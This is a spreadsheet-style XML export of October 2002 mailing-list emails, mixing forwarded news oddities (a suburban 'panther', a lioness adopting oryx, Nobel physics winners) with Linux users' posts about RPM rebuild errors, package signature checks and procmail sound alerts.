    <t>To: zzzzteana@yahoogroups.com\nFrom: "Scott Wood" &lt;skitster@hotmail.com&gt;\nDate: Tue, 08 Oct 2002 15:48:40 +0100</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 15:48:40 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] Punch bags filled with incontinence pads</t>
  </si>
  <si>
    <t>[URL]http://www.thisislocallondon.co.uk[/URL]\n\nAn investigation has been launched after punch bags on sale in Greenwich \nwere found to be stuffed with incontinence pads and bandages.\n\nTrading standards officers, working for Greenwich Council, were alerted to \nthe situation after a Bryan punch bag, purchased in Argos, in Charlton Road, \nCharlton, was found to be full of bandages.\n\nAlso stuffed inside the piece of sporting equipment was a letter from a \nwoman in Fife stating how she felt quite disgusted' about the bag and asking \nfor the filling to be tested.\n\nThe unfortunate shopper had bought his first bag, at Argos, in Lewisham High \nStreet, but had returned it because on investigation of a leak he was \nhorrified to discover it was filled with incontinence pads.\n\nSo far, officers have purchased two of the punch bags, only to find they \ncontain incontinence pads and strips of shredded duvet.\n\nCabinet member for public services Councillor Angela Cornforth said: "This \nis one of the strangest stories I have every heard.\n\n"Our officers are in the process of investigating and will no doubt discover \nwhy the bags contain such unusual contents."\n\n12:18 Tuesday 8th October 2002\n\n\n\n\n_________________________________________________________________\nChat with friends online, try MSN Messenger: [URL]http://messenger.msn.com[/URL]\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\nPlan to Sell a Home?\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://www.thisislocallondon.co.uk http://messenger.msn.com http://us.click.yahoo.com http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: "Scott Wood" &lt;skitster@hotmail.com&gt;\nDate: Tue, 08 Oct 2002 15:45:28 +0100</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 15:45:28 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] Plumstead Panther - Pictures!</t>
  </si>
  <si>
    <t>Looks and sounds a hell of a lot like Clare's cat, Violence...\n\nA tall tail or is it a prowling panther?\n\n\n[URL]http://www.thisislocallondon.co.uk[/URL]\n\n\nSecurity cameras at the Gardiner house filmed the cat\nThe Plumstead panther has been spotted just yards from the scene of a \nsighting made three weeks ago but this time it was caught on camera.\n\nSteve Gardiner, 41, claims to have spotted the large cat in his garden in \nUpton Road, Plumstead, in the sixth reported sighting in Woolwich and Bexley \nin just four weeks.\n\nMr Gardiner told News Shopper he watched the big cat as it walked alongside \nthe house at about 7.15am, on Wednesday, September 25, while his security \ncameras captured it on film.\n\nThe father-of-four described the black cat as about 3ft long and \ntwo-and-a-half-foot high, with a large body.\n\nHe said: "It prowled past the patio doors moving with all the mannerisms of \na hunter.\n\n"It looked at me calmly before moving on."\n\nThe bricklayer told how his work colleagues let him know News Shopper had \nbeen following the big cat story so he decided to call our offices with news \nof the sighting.\n\nHis wife, Karen, 41, later checked the tape which had captured grainy images \nof the large cat prowling through their garden.\n\nShe said: "I feel sorry for it not living in its natural habitat I'd hate \nfor it to get hurt."\n\nMr Gardiner told how he is convinced of the cat's existence saying how their \nusually quiet 18-year-old dog barks at "nothing" in the garden but barked \nthat morning.\n\nHe warned: "I don't think these cats are dangerous but, if cornered, they \nmight jump you."\n\nSightings of the large black cat are being reported all over the Plumstead \nCommon and Shooters Hill as well at the Bexley area.\n\nIf you have seen the big cat, call News Shopper on 01689 885712.\n\n12:27 Tuesday 8th October 2002\n\n\n\n_________________________________________________________________\nSend and receive Hotmail on your mobile device: [URL]http://mobile.msn.com[/URL]\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\nSell a Home for Top $\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://www.thisislocallondon.co.uk http://mobile.msn.com http://us.click.yahoo.com http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: zzzzteana &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "Tim Chapman" &lt;timc@2ubh.com&gt;\nDate: Tue, 08 Oct 2002 13:32:45 +0100</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 13:32:45 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] Astro bits</t>
  </si>
  <si>
    <t>HUBBLE SPOTS AN ICY WORLD FAR BEYOND PLUTO\n------------------------------------------\nAstronomers have discovered a distant body that appears to be the\nlargest object in the Kuiper Belt, a body half the size of Pluto that\nraises new questions about the definition of a planet. The icy world\n2002 LM60 has been dubbed "Quaoar".\n\n    [URL]http://spaceflightnow.com[/URL]\n\n\nASTRONOMERS SLICE AND DICE GALAXIES\n-----------------------------------\nNew views of star birth and the heart of a spiral galaxy have been\nseen by a state-of-the-art astronomical instrument on its first\nnight. The new spectrometer has a revolutionary ability to 'slice'\nany object in the sky into sections, producing a three dimensional\nview of the conditions throughout entire galaxies in a single\nobservation.\n\n    [URL]http://spaceflightnow.com[/URL]\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\nSell a Home with Ease!\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://spaceflightnow.com http://spaceflightnow.com http://us.click.yahoo.com http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: zzzzteana &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "Tim Chapman" &lt;timc@2ubh.com&gt;\nDate: Tue, 08 Oct 2002 13:30:43 +0100</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 13:30:43 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] Language problems</t>
  </si>
  <si>
    <t>Ananova: \nNewspaper's readers complain over 'let's have sex' picture caption\n\nReaders of an African newspaper have complained after a picture caption\nabout jewellery contained the words "let's have sex".\nThe mix-up highlights the problems caused by the wide range of languages\nspoken in Namibia.\nCallers to the Namibian were angered by the use of the word tulumweni, which\ntranslates roughly as "let's have intercourse" in the Oshiwambo language.\nIt was used in a caption concerning people in the Caprivi who use rings from\nthe femidon - female condom - as jewellery.\nAccording to the The Namibian , an activist involved in care for Aids/HIV\npatients spelt the word tulumweni for the journalist.\nHe intended it to mean "you will see for yourselves" in the Siyeyi tongue.\nOne caller said the complainants "should be considerate of other people's\nlanguages. It is very clear that the picture was taken in the Caprivi ...And\nthat the word is from Siyeyi. It is not Oshiwambo".\nOthers indicated that various words might have different meanings in various\nNamibian languages, such as omakende, an Oshiwambo word for glasses which in\nSiyeyi means testicles.\nAnother word with a double-meaning is tulikunde, which in Oshiwambo\ntranslates as let's talk, but which in Sisubiya translates as let's have\nintercourse.\nThe Herero word for a hat is ekoli, which is an Oshiwambo word for a vagina.\nStory filed: 12:37 Tuesday 8th October 2002\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: zzzzteana &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "Tim Chapman" &lt;timc@2ubh.com&gt;\nDate: Tue, 08 Oct 2002 13:28:56 +0100</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 13:28:56 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] Dracula theme park could be switched to Bucharest</t>
  </si>
  <si>
    <t>Ananova: \nDracula theme park could be switched to Bucharest\n\nA controversial scheme to build a Dracula theme park in Romania could be\nswitched away from Transylvania.\nConsultants PricewaterhouseCoopers is now recommending that it be built in\nBucharest instead.\nIt comes after Prince Charles led international protests against the\noriginal proposals to build it in the medieval town of Sigishoara.\nPricewaterhouseCoopers name Bucharest, originally believed to be an outsider\nin the race to host the park, as the most profitable location for the\nproject.\nBut that has angered residents in Sigishoara, where Vlad the Impaler, the\ninspiration for Dracula, was born. They are counting on the park to boost\nthe local economy.\nEvenimentul Zilei reports that Sigishoara was placed behind the capital with\nthe Black Sea port of Constanta third choice.\nDorin Danesan, mayor of Sigishoara, said: "The pre-feasibility report from\nPWC shows that the park would attract more tourists if it was located in\nBucharest. But I still think that Sigishoara is the best location for it."\nThe park would include hotels, a Dracula roller coaster, catacombs, a ghost\ntrain and a house of horrors, as well as vampire dungeons located around a\nreconstruction of Dracula's castle and an artificial lake.\nThe project has also been objected to by the world heritage organisation\nUnesco fearing Sigishoara might be spoilt.\nPricewaterhouseCoopers is to present its final report on the project on\nOctober 15.\nStory filed: 13:16 Tuesday 8th October 2002\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\nPlan to Sell a Home?\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Ben Liblit &lt;liblit@eecs.berkeley.edu&gt;\nDate: Tue, 08 Oct 2002 13:05:53 -0700</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 13:05:53 -0700</t>
  </si>
  <si>
    <t>Matthias Haase wrote: &gt; The recompile of the SPRM failed for me with: &gt; #---- &gt; RPM build errors: &gt;     File not found by glob: &gt; /var/tmp/freetype-2.1.2-root/usr/lib/libttf.so.* &gt;     File not found: /var/tmp/freetype-2.1.2-root/usr/lib/libttf.so Weird.  I had no problems at all rebuilding from the SRPM with specfile modified to enable the bytecode interpreter.  The "check-files" test warns that "/usr/share/aclocal/freetype2.m4" was not included in any package, but other then that, it's all perfectly clean. _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Ben Liblit &lt;liblit@eecs.berkeley.edu&gt;\nDate: Tue, 08 Oct 2002 12:57:53 -0700</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 12:57:53 -0700</t>
  </si>
  <si>
    <t>Matthias Haase wrote: &gt; The bytecode-interpreter *is* disabled on RH8, defined at line 3 in &gt; the Specfile of the SRPM. Right you are.  The SRPM includes a patch to enable it, but then the specfile defaults to not applying that patch.  I saw the former but missed the later.  Egad, what a convoluted maze. Sorry for the misinformation! _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: brendan@zen.org\nFrom: Waider &lt;waider@waider.ie&gt;\nDate: Tue, 08 Oct 2002 12:23:34 +0200</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 12:23:34 +0200</t>
  </si>
  <si>
    <t>brendan@zen.org</t>
  </si>
  <si>
    <t>Brendan Kehoe wrote:\n&gt; As a workaround, the various distributions could use a GPG singature to verify \n&gt; correctness of the file.  Since the distributor's secret key is required to \n&gt; create that signature, it would add a pretty significant step that would have \n&gt; to be taken to make it possible to replace both a rpm or apt file and its \n&gt; accompanying signature.\n\nCheck your local friendly Red Hat installation:\n\n[root@localhost up2date]# rpm --checksig zsh-4.0.2-2.src.rpm\nzsh-4.0.2-2.src.rpm: md5 gpg ok\n\nOf course, this is only as useful as, say, the gpg keys distributed with \nthe Kernel tarballs, i.e. if you don't actually bother checking the sig \nthen you are open to abuse. It's entirely possible that rpm can be \nconfigured to require good signatures, but I've not read that part of \nthe fine manual just yet.\n\nCheers,\nWaider.\n-- \nwaider@waider.ie / Yes, it /is/ very personal of me\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: zzzzteana &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "Tim Chapman" &lt;timc@2ubh.com&gt;\nDate: Tue, 08 Oct 2002 12:18:52 +0100</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 12:18:52 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] Lioness adopts fifth antelope</t>
  </si>
  <si>
    <t>[URL]http://www.guardian.co.uk[/URL],3604,806579,00.html\n\nLioness adopts fifth antelope\n\nRory Carroll, Africa correspondent\nTuesday October 8, 2002\nThe Guardian\n\nKamuniak the dysfunctional lioness has forfeited another meal by adopting\nher fifth baby oryx this year, an aberration of nature which has baffled\nwildlife experts.\nThe young lioness in the Samburu national park in northern Kenay adopted her\nlatest baby at the weekend, a wildlife service warden said yesterday.\nEach time Kamuniak, whose name means "the blessed one" in the local Samburu\ntongue, has tried to protect the antelopes from other predators and allowed\nthe natural mothers to feed them.\nUnfortunately for her, one oryx ended up in the belly of a male lion while\nKamuniak slept; the others were either rescued by wardens or retrieved by\ntheir natural mothers.\nThe wardens think the latest adoptee, nicknamed Naisimari ("taken by\nforce"), was adopted at the weekend.\n"She must have adopted her on Sunday because they are in harmony," said\nGabriel Lepariyo, a warden.\nNaisimari's natural mother has been seen shadowing the odd couple at a\ndistance.\nTheories to explain the phenonemon abound: not having her own cubs, Kamuniak\nis lonely; she is colour-blind and short-sighted and thinks the calves are\ncubs; the oryx were too frail to flee, breaking the classic prey behaviour\nand confusing the hunter; Kamuniak wants to be a vegetarian; Kamuniak wants\nto be loved. \n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\nSell a Home with Ease!\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: zzzzteana &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "Tim Chapman" &lt;timc@2ubh.com&gt;\nDate: Tue, 08 Oct 2002 12:17:28 +0100</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 12:17:28 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] Nobel astrophysicists</t>
  </si>
  <si>
    <t>Nobel Honors 3 for Astrophysics Work \n\nTuesday October 8, 2002 12:00 PM\nSTOCKHOLM, Sweden (AP) - Two Americans and a Japanese won the Nobel Prize in\nphysics Tuesday for using some of the most obscure particles and waves in\nnature to understand the workings of astronomy's grandest wonders.\nRiccardo Giacconi, 71, of the Associated Universities Inc. in Washington,\nD.C., will get half of the $1 million prize for his role in ``pioneering\ncontributions to astrophysics, which have led to the discovery of cosmic\nX-ray sources.''\nRaymond Davis, Jr., 87, of the University of Pennsylvania shares the other\nhalf of the prize with Japanese scientist Masatoshi Koshiba, 76, of the\nUniversity of Tokyo. The two men pioneered the construction of giant\nunderground chambers to detect neutrinos, elusive particles that stream from\nthe sun by the billion.\nNeutrinos offer an unparalleled view of the sun's inner workings because\nthey are produced in its heart by the same process that causes it to shine.\nIn fact, Davis' early experiments, performed during the 1960s in a South\nDakota gold mine, confirmed that the sun is powered by nuclear fusion.\nKoshiba won his share of the prize for his work at the Kamiokande neutrino\ndetector in Japan. That experiment confirmed and extended Davis' work, and\nalso discovered neutrinos coming from distant supernova explosions, some of\nthe brightest objects in the universe.\nThe Italian-born Giacconi, a U.S. citizen, was awarded half of the prize for\nbuilding the first X-ray telescopes that provided ``completely new - and\nsharp - images of the universe,'' the academy said.\nHis research laid the foundation for X-ray astronomy, which has led to the\ndiscovery of black holes and allowed researchers to peer deep into the\nhearts of the dusty young galaxies where stars are born.\nWhen academy officials reached Giacconi by phone at his home outside\nWashington, he said he was ``dumbstruck'' to learn of the prize. Koshiba\nalso was phoned at home in Tokyo, but the academy was still trying to reach\nDavis, spokesman Erling Norrby said.\nThis year's Nobel awards started Monday with the naming of Britons Sydney\nBrenner, 75, and Sir John E. Sulston, 60, and American H. Robert Horvitz,\n55, as winners of the medicine prize, selected by a committee at the\nKarolinska Institute.\nThe researchers shared it for discoveries about how genes regulate organ\ngrowth and a process of programmed cell deaths that shed light on how\nviruses and bacteria invade human cells, including in conditions such as\nAIDS, strokes, cancer and heart attacks.\nThe winner of the Nobel Prize in chemistry will be named on Wednesday\nmorning and the Bank of Sweden Prize in Economic Sciences in Memory of\nAlfred Nobel later the same day.\nThe literature prize winner will be announced on Thursday, the Swedish\nAcademy said on Tuesday.\nThe winner of the coveted peace prize - the only one not awarded in Sweden -\nwill be announced Friday in Oslo, Norway.\nThe award committees make their decisions in deep secrecy and candidates are\nnot publicly revealed for 50 years.\nAlfred Nobel, the wealthy Swedish industrialist and inventor of dynamite who\nendowed the prizes left only vague guidelines for the selection committees.\nIn his will he said the prize being revealed on Tuesday should be given to\nthose who ``shall have conferred the greatest benefit on mankind'' and\n``shall have made the most important discovery or invention within the field\nof physics.''\nThe Royal Swedish Academy of Sciences, which also chooses the chemistry and\neconomics winners, invited nominations from previous recipients and experts\nin the fields before cutting down its choices. Deliberations are conducted\nin strict secrecy.\nThe prizes are presented on Dec. 10, the anniversary of Nobel's death in\n1896, in Stockholm and in Oslo.\n---\nOn the Net:\nNobel site, [URL]http://www.nobel.se[/URL] \n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\nPlan to Sell a Home?\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://www.nobel.se http://us.click.yahoo.com http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: zzzzteana &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "Tim Chapman" &lt;timc@2ubh.com&gt;\nDate: Tue, 08 Oct 2002 12:15:50 +0100</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 12:15:50 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] And deliver us from weevil</t>
  </si>
  <si>
    <t>[URL]http://www.guardian.co.uk[/URL],12374,806695,00.html\n\nWeevil pest warms to life in south-west London\n\nJames Meek, science correspondent\nTuesday October 8, 2002\nThe Guardian\n\nThey're chomping in Chelsea, Fulham and Pimlico, but despite their fancy\ntaste in London addresses they are neither posh nor particularly fussy: they\nare vine weevils and they want to eat your plants.\nTwo species of vine weevil previously unable to survive Britain's cold\nwinters have been discovered in south-west London, and one has also been\ndetected in Surrey, Cardiff and Edinburgh.\n"This is probably the most serious new garden pest in recent memory," said\nMax Barclay, the curator of beetles at the Natural History Museum in London\nwho discovered the creatures in the UK.\nThe black vine weevil has long been native to Britain, causing enormous\ndamage to glossy leaved plants such as laurels. But the two new species,\notiorhynchus armadillo and otiorhynchus salicicola, not previously known\nnorth of Switzerland, are now prevalent in south London. "It's very likely\nthese weevils have been introduced to Britain through imported ornamental\nplants from Italy," said Dr Barclay. "It looks like they're here to stay."\nHe found otiorhynchus armadillo on the window of a Chelsea department store\nin 1998, but as the shop sold imported house plants, he assumed it was a\nmigrant. It has now quietly become the most common species of vine weevil in\nsouth-west London. The second invader is not so numerous, but has\nestablished itself firmly in the same area.\nApart from laurels, vine weevils attack bay, viburnum, ornamental ivy, and\ngrape vines. An early sign of trouble is that notches appear in leaves. The\nsoil-dwelling larvae bite the roots off below the surface.\nOne possible explanation for the invaders' successful colonisation of\nBritain is global warming. Earlier springs and milder winters are already a\nfact.\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\nSell a Home with Ease!\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: zzzzteana &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "Tim Chapman" &lt;timc@2ubh.com&gt;\nDate: Tue, 08 Oct 2002 12:14:41 +0100</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 12:14:41 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] Bashing the bishop</t>
  </si>
  <si>
    <t>[URL]http://www.guardian.co.uk[/URL],2763,806744,00.html\n\nEvangelicals' threat to new archbishop\n\nDirect action threat over liberal views on sexuality\n\nStephen Bates, religious affairs correspondent\nTuesday October 8, 2002\nThe Guardian\n\nEvangelical fundamentalists last night stepped up their campaign to oust\nRowan Williams, the incoming Archbishop of Canterbury, before he even takes\nup his post, by threatening to take "direct action" against him.\nThe council of the Church Society, the Church of England's oldest\nevangelical body, joined a younger evangelical pressure group called Reform,\nwhich is also opposed to Dr Williams, in calling on him to recant his\nsupposedly liberal views on sexuality or stand down.\nFollowing an emergency meeting, the 167-year-old society, whose leaders met\nthe archbishop last week, proclaimed their continued opposition to his\nappointment and called on all Anglicans to spurn him.\nThe move is the latest stage of an increasingly aggressive attempt to\ndestabilise the new archbishop, whose leftwing political views are regarded\nwith deep suspicion by the conservative fringes of the evangelical movement.\nSome evangelicals object to Dr Williams's acknowledgement that he has\nordained a gay priest, something many bishops have done, and that those who\nhave sex outside marriage need not necessarily be spurned. The new\narchbishop has repeatedly assured them that he respects the canons of the\nchurch.\nNevertheless, the society said: "It is clear that he prefers his private\njudgment to the voice of scripture, to the voice of tradition and to the\ncommon mind of the church. As such he can only be a focus of disunity.\n"The council... called upon loyal Anglicans to pray specifically that Rowan\nWilliams would see the error in his teaching, change his views or stand\ndown," it said.\nThe society claimed to have drawn up an "action plan," including calling on\nbishops and primates of the 70 million worldwide Anglican communion, of\nwhich archbishops of Canterbury are the leaders, to distance themselves from\nDr Williams's doctrinal and ethical position. It promised it would be\n"taking steps towards appropriate direct action".\nIt added that Dr Williams remained on the editorial board of a journal\ncalled Theology and Sexuality which, six months ago, published articles\nallegedly commending homosexual behaviour.\nDespite its claim, the society does not represent the common mind of the\nchurch. Dr Williams, currently Archbishop of Wales, was chosen by the crown\nappointments commission of church members, including evangelicals, and his\nappointment was endorsed by the prime minister and the Queen.\nHe is due to succeed George Carey, who retires this month, and will be\nformally enthroned at Canterbury cathedral in February.\nAsked what form direct action might take, the Rev George Curry, the\nsociety's chairman, said: "Watch this space." Presumably it could involve a\nsmall minority of parishes repudiating the new archbishop and seeking\nalternative oversight or even demonstrations at services where Dr Williams\nis present.\nChurch of England bishops, who have hitherto largely kept their heads down\nduring the row, are meeting next week to discuss their response to the\nevangelical extremists' challenge, which appears to have grown in the\nabsence of a robust rebuttal.\nA letter by senior theologians in today's Guardian, however, repudiates the\nevangelicals' tactics, calling them unseemly and contrary to biblical\nteaching.\nOn the BBC's Thought for the Day yesterday, Angela Tilby, vice-principal of\nWestcott House, Cambridge, accused Dr Williams's opponents of presumption\nand blackmail. "It is in fact a thoroughly aggressive way to behave. It is\nattempting to force an issue by emotional violence... manipulating to get\nyour way is often preferable to painstaking negotiation," she said.\nLast week, Dr Williams said he was deeply saddened. "Matters of sexuality\nshould not have the priority or centrality that Reform and the Church\nSociety have tried to give them. The archbishop cannot withdraw his\nappointment since so many, including evangelicals, have urged him to take\nthe post... the archbishop believes it to be his duty under God."\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\nSell a Home with Ease!\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: zzzzteana &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "Tim Chapman" &lt;timc@2ubh.com&gt;\nDate: Tue, 08 Oct 2002 12:10:07 +0100</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 12:10:07 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] Uncle Mark seeks parole</t>
  </si>
  <si>
    <t>[URL]http://news.bbc.co.uk[/URL]\n\nTuesday, 8 October, 2002, 07:55 GMT 08:55 UK\nLennon killer seeks parole again\n\nThe man who shot dead former Beatle John Lennon is making another bid for\nearly release from prison - the day before what would have been Lennon's\n62nd birthday.\nMark David Chapman, 47, was jailed for life after he admitted killing the\nsuperstar outside his New York apartment building in 1980.\nIt is the second time in two years that Chapman has sought parole from\nAttica state prison.\nAt a 2000 hearing, he argued that he was no longer a danger to society and\nhad overcome the psychological problems which led him to shoot the\nex-Beatle.\nChapman had said that a voice in his head told him to shoot the star.\nShot dead\nLennon was shot four times as he emerged from a limousine outside his New\nYork City apartment on 8 December 1980.\nHe and his wife Yoko Ono were returning from a late-night recording session\nduring which time they had been working on Walking on Thin Ice.\nOnly hours before the shooting, Chapman - who had come to New York from\nHawaii - was photographed with the singer outside the same building as\nLennon signed a copy of his album Double Fantasy for him.\nThe killer said Lennon had been just "a picture on an album cover" to him\nbefore the shooting.\n'Deserved death'\nChapman has said that he should have received the death penalty for his\ncrime.\nLennon's widow told the 2000 parole hearing that she would not feel safe if\nChapman were released.\nLennon's songwriting partnership with Paul McCartney propelled the\nLiverpool-based pop group to international stardom and unparalleled\ncommercial success.\nThe Beatles front man, peace campaigner, and all-round iconoclast, would\nhave been 62 on Wednesday.\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\nPlan to Sell a Home?\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org, dag@newtech.fi\nFrom: Hal DeVore &lt;haldevore@acm.org&gt;\nDate: Tue, 08 Oct 2002 10:21:13 -0500</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 10:21:13 -0500</t>
  </si>
  <si>
    <t>exmh-users@spamassassin.taint.org, dag@newtech.fi</t>
  </si>
  <si>
    <t>BTW:  I remember messing about with such things long ago.  One \nproblem I ran into was making sure that no attempt was made to \nplay a sound when either:\n\na)  the screen was locked\n  or\nb)  no exmh was running.\n\nJust something to think about, Dag.\n\n\n--Hal\n\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Roi Dayan &lt;dejavo@punkass.com&gt;\nDate: Tue, 08 Oct 2002 09:30:10 +0200</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 09:30:10 +0200</t>
  </si>
  <si>
    <t>xine src packge still gives errors</t>
  </si>
  <si>
    <t>Hi I try to rebuild xine from src package and I get these errors: . . . . . Finding  Provides: /usr/lib/rpm/find-provides Finding  Requires: /usr/lib/rpm/find-requires PreReq: rpmlib(PayloadFilesHavePrefix) &lt;= 4.0-1  rpmlib(CompressedFileNames) &lt;= 3.0.4-1 Requires(rpmlib): rpmlib(PayloadFilesHavePrefix) &lt;= 4.0-1  rpmlib(CompressedFileNames) &lt;= 3.0.4-1 Requires: xine-libs = 0.9.13 /bin/sh Obsoletes: xine-devel RPM build errors:     user dude does not exist - using root     user dude does not exist - using root     user dude does not exist - using root     user dude does not exist - using root     user dude does not exist - using root     File not found: /var/tmp/xine-root/usr/bin/aaxine thx, Roi _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Roi Dayan &lt;dejavo@punkass.com&gt;\nDate: Tue, 08 Oct 2002 09:27:36 +0200</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 09:27:36 +0200</t>
  </si>
  <si>
    <t>humberto@hpcf.upr.edu wrote: &gt;Redhat 8 disables all support for .mp3 files, relinking xmms with a zzmp3  &gt;module. Does anyone have a fixed spec file for xmms? One that can play mp3's  &gt;would be best. &gt; &gt;   &gt; oh xmms didn't work for me also i used mpg123 i tought its something from me like mplayer not working also and gives black screen _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Dag Nygren &lt;dag@newtech.fi&gt;\nDate: Tue, 08 Oct 2002 09:25:13 +0300</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 09:25:13 +0300</t>
  </si>
  <si>
    <t>&gt;  &gt;  &gt; &gt;&gt;&gt;&gt;&gt; On Tue, 8 Oct 2002, "Dag" == Dag Nygren wrote: &gt;  &gt;   Dag&gt; but when procmail runs it it doesn't, presumably as it &gt;   Dag&gt; doesn't have the authorization to communicate with the &gt;   Dag&gt; laptop, beeing another user? &gt;  &gt; I don't know anything about the KDE sound server but I'd guess  &gt; your problem is the "environment" in which procmail runs.  You  &gt; don't say what procmail is running from.  In my case, for  &gt; example, procmail is run from fetchmail which is run by a cron  &gt; job. Sorry about that, procmail is run by the qmail delivery agent to presort all mail I get. But anyway, I found an error message in procmail.log, which solved the problem. The following line in my delivery script seems to work fine now: DISPLAY=:0.0 artsplay  Thanks Dag _______________________________________________ Exmh-users mailing list Exmh-users@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
